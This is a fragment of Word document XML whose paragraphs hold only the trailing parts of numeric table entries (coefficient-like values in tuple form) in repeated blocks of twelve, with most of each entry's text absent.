    <w:p w14:paraId="222D9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8), 2.64},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491254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2), 2.48},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4CB8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6), 2.39},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3ED58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4), 2.29},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E922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0), 2.18},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A090F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1), 2.07},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E50BAC" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07FDA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 4.49},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F2C3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 3.63},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27440E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3), 3.24},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FE5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4), 3.01},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA630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 2.85},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359205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6), 2.74},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DFC68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8), 2.59},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174C075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2), 2.42},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC249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6), 2.33},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A963C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4), 2.24},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209529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0), 2.13},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157340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1), 2.01},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0184F455" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="649E1F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 4.45},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212365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 3.59},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660726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3), 3.20},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6943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4), 2.96},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5043A72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 2.81},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6FB8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6), 2.70},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0A43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8), 2.55},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BE8954"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7, 12), 2.38},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A73FC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6), 2.29},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624643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4), 2.19},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA21F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0), 2.08},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3290EA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1), 1.96},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C836B47" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58B78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 4.41},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130C83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 3.55},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6224670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3), 3.16},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29924A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4), 2.93},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3EC0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 2.77},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E67B96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6), 2.66},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3FC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8), 2.51},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25657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2), 2.34},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41576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6), 2.25},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C8EC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4), 2.15},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24233C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0), 2.04},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C9AD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1), 1.92},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3222FDF3" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03750F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 4.38},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDE5C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 3.52},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399A52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3), 3.13},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70647C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4), 2.90},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A181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 2.74},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682D42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6), 2.63},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B6C7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8), 2.48},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A800F3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2), 2.31},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD44C8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6), 2.21},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7489B7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4), 2.11},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624EDA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0), 2.00},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0625A9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1), 1.88},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DDEC63F" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="166855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 4.35},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB616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 3.49},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53989A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3), 3.10},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205E403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4), 2.87},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD1DE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 3.71},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4057D6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6), 2.60},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BCB1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8), 2.45},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F46AD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2), 2.28},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB32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6), 2.18},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F64DE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4), 2.08},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC081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0), 1.96},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2347EE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1), 1.84},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19A7B07C" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="512A39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 4.32},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE6DC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 3.47},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B66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3), 3.07},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE27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4), 2.84},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D339F2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 2.68},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106D9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6), 2.57},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56676EC5"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1, 8), 2.42},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59116C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2), 2.25},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C75E0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6), 2.15},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2140F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4), 2.05},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542D04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0), 1.93},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E194F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1), 1.81},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0C5FA9" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51BE8EA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 4.30},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1673F9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 3.44},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A33E8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3), 3.05},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347D31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4), 2.82},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F16E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 2.66},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662416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6), 2.55},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117EB8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8), 2.40},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458888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2), 2.23},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F414B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6), 2.13},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCC2C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4), 2.03},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E6C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0), 1.91},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A14B1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1), 1.78},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F92769" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F69A7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 4.28},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335780A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 3.42},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF023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3), 3.03},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8D9C6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4), 2.80},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB594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 2.64},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0CDDB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6), 2.53},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A36C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8), 2.38},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6597CF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2), 2.20},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1026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6), 2.11},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AECF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4), 2.00},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676DD4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0), 1.88},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B6FF1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1), 1.76},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1083F024" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30A04F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 4.26},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112034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 3.40},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B980F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3), 3.01},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A5A9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4), 2.78},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757170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 2.62},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE47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6), 2.51},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FB8D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8), 2.36},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78608B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2), 2.18},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD1361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6), 2.09},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371560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4), 1.98},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A15C6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0), 1.86},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406468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1), 1.73},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F7FDBB" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52CDCE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 4.24},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C70DC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 3.38},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B5FA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3), 2.99},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704E0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4), 2.76},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C5B23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 2.60},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F739376"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5, 6), 2.49},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FECEE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8), 2.34},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9805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2), 2.16},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66204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6), 2.07},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E473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4), 1.96},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0D6AC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0), 1.84},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C62E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1), 1.71},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F5DF3F" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D825A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 4.22},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE69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 3.37},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B4B2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3), 2.98},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533CF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4), 2.74},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645C7E6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 2.59},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6AE1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6), 2.47},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E685D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8), 2.32},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C8FC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2), 2.15},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D85C1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6), 2.05},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6B2B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4), 1.95},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7D37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0), 1.82},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B817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1), 1.69},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7892AA" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="289F56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 4.21},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CB344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 3.35},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A1872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3), 2.96},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CB74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4), 2.73},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584A0A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 2.57},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B79A9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6), 2.46},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7562AD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8), 2.30},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B34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2), 2.13},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AF3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6), 2.03},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65FE7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4), 1.93},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4FFDE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0), 1.80},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCCAB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1), 1.67},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCF23B9" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="489A7C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 4.20},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69ABC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 3.34},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4680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3), 2.95},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B25A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4), 2.71},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624615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 2.56},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A24A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6), 2.44},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E167B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8), 2.29},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F8321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2), 2.12},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B7E0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6), 2.02},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3CA7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4), 1.91},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEB58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0), 1.78},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BEF3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1), 1.65},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1589D40E" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6398DE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 4.18},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9135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 3.33},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBC5E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3), 2.93},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687BCF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4), 2.70},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E38F6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9, 5), 2.54},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650175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6), 2.43},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FFDF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8), 2.28},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A21A7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2), 2.10},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481A1D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6), 2.00},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE26D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4), 1.90},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A134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0), 1.77},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145BC3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1), 1.64},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5FF462" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F2F08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 4.17},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7178F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 3.32},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3A63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3), 2.92},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F733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4), 2.69},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06857B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 2.53},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E035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6), 2.42},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396C3C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8), 2.27},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="086377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2), 2.09},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE3BD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6), 1.99},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE408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4), 1.89},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70222D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0), 1.76},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2F03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1), 1.62},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A2A318" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0257A2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 4.12},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F9D1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 3.26},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68DA21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3), 2.87},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134DF6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4), 2.64},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31020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 2.48},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3532FEC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6), 2.37},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006576A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8), 2.22},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F86CF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2), 2.04},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C97C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6), 1.94},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29ACCB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4), 1.83},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6501C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0), 1.70},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1130ED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1), 1.57},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D26BE08" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7254F87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 4.08},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CC087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 5.23},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6D18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3), 2.84},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A49BA0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4), 2.61},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297295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 2.45},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD0E7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6), 2.34},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085241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8), 2.18},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B473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2), 2.00},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BB12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6), 1.90},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABDBB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4), 1.79},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDAA5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0), 1.66},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFDAD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1), 1.51},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5805DC6C" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73E603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 4.06},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A1133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 3.21},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60ED59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3), 2.81},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8C52C3"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45, 4), 2.58},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4FC4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 2.42},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5522FB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6), 2.31},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0F9B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8), 2.15},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CD78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2), 1.97},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8A5D8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6), 1.87},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6331F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4), 1.76},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DFE71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0), 1.63},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754DF0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1), 1.48},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A18707A" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="269FC3A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 4.03},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2099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 3.18},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB395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3), 2.79},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177297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4), 2.56},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221A2B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 2.40},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6106ED1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6), 2.29},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C340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8), 2.13},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A8606B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2), 1.95},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BB63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6), 1.85},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E25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4), 1.74},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1BF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0), 1.60},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA48E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1), 1.44},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66044DC2" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E280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 4.00},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702151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 3.15},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4948EC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3), 2.76},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D99E0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4), 2.52},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634495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 2.37},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59156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6), 2.25},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258BDC1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8), 2.10},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01883C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2), 1.92},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628B66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6), 1.81},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E062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4), 1.70},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731F70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0), 1.56},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183968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1), 1.39},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D65735A" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68072D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 3.98},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7657E7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 3.13},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256541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3), 2.74},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38908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4), 2.50},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B521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 2.35},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363F84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6), 2.23},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDDC0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8), 2.07},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3AE2C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2), 1.89},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111A9F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6), 1.79},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4561B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4), 1.67},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51511D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0), 1.53},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF285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1), 1.35},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ED6D18" w14:textId="77777777" w:rsidR="00CC2EBA" w:rsidRPr="00CC2EBA" w:rsidRDefault="00CC2EBA" w:rsidP="00CC2EBA">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:ind w:left="709" w:hanging="709"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="007EEA9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 3.96},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFA77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 3.11},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C83342"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80, 3), 2.72},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29635F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4), 2.49},</w:t>
      </w:r>
    </w:p>
